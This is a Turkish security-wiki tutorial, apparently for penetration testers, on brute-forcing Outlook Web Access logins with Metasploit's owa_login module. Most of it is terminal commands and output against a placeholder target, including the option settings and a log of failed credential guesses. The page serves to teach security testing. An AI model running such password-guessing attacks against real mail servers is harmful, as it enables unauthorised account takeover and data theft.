OWA Hesaplarına Bruteforce Denemeleri

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Microsoft OWA(Outlook Web Access) kurumsal ortamlarda en fazla tercih edilen webmail uygulaması olarak karşımıza çıkmaktadır. Günümüz iş dünyasının en temel iletişim araçlarından birinin e-posta(mail) olduğu düşünülürse dışarı açık OWA sistemlerinin büyük risk taşıdığı söylenebilir.

Ele geçirilecek bir mail hesabı sadece sahibinin güvenliğini değil şirketin güvenliğini de tehlikeye atmaktadır. Basit mantıkla düşünülecek olursa ele geçirilmiş bir mail hesabı üzerinden hem sosyal mühendislik saldırıları hem de şirket çalışanlarının tüm özlük bilgileri sızdırılabilir. Bu nedenle pentest çalışmalarında e-posta hesaplarının tahmin yöntemiyle ele geçirilmesi adımı önemli rol oynamaktadır.

İnternet üzerinden indirilecek çoğu "brute force" yazılımı yeni nesil OWA sürümlerini desteklememekte ya da stabil çalışmamaktadır. Metasploit Aux modüllerine eklenen güncel modül -owa_login- kullanılabilir en sağlam hesap deneme yazılımı olarak gözükmektedir. OWA brute force aux modülü kullanılarak OWA 2003, 2007, 2010 ve 2012 sürümlerine yönelik brute force çalışmaları gerçekleştirilebilmektedir.

Lab Senaryosu:

root@bt:/pentest/exploits/framework3# ./msfconsole
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 768 exploits - 406 auxiliary - 119 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r14338 updated 15 days ago (2011.12.02)

msf > search owa

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/owa_login normal Outlook Web App (OWA) Brute Force Utility

msf > use auxiliary/scanner/http/owa_login
msf auxiliary(owa_login) > show options

Module options (auxiliary/scanner/http/owa_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 443 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VERSION 2007 yes OWA VERSION (2003, 2007, or 2010)
VHOST no HTTP server virtual host

“show options” komutu ile ekrana basılan seçenekler incelenirse bruteforce yapılırken ihtiyaç duyulabilecek bileşenlerin tamamına yakını bulunmaktadır. Detaylı bir düzenleme yapılması gerektiğinde “show advanced” komutu da kullanılabilir.

msf auxiliary(owa_login) > set USERPASS_FILE /root/owa_test

USERPASS_FILE => /root/owa_test
msf auxiliary(owa_login) > set RPORT 443
RPORT => 443
msf auxiliary(owa_login) > set VHOST mail.HEDEF_SITE.com.tr
VHOST => mail.HEDEF_SITE.com.tr
msf auxiliary(owa_login) > run
[*] mail.HEDEF_SITE.com.tr:0 OWA - Testing version 2010

[*] mail.HEDEF_SITE.com.tr:0 OWA - Trying ali : ali
-msf auxiliary(owa_login) > run

[*] mail.HEDEF_SITE.com.tr:443 OWA - Testing version 2010
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : HEDEF_SITE
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'HEDEF_SITE'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : ali
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : 'ali'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying sam : sam
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'sam' : 'sam'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user : user
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user' : 'user'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user@domain.com : user@domain.com
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user@domain.com' : 'user@domain.com'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : veli
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : 'veli'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying sam : john
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'sam' : 'john'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : 12345
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : '12345'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user : passwoed
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user' : 'passwoed'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user@domain.com : aliveli
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user@domain.com' : 'aliveli'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : as
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'as'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : df
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'df'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : er
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'er'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : r
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'r'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : tt
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'tt'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE :
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : yu
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'yu'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : u
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'u'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : yy
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'yy'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : tg
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'tg'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 3
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '3'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 4
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '4'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 45
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '45'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : bt
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'bt'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : ertvt
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'ertvt'
[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : grt
[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'grt'
[*] Auxiliary module execution completed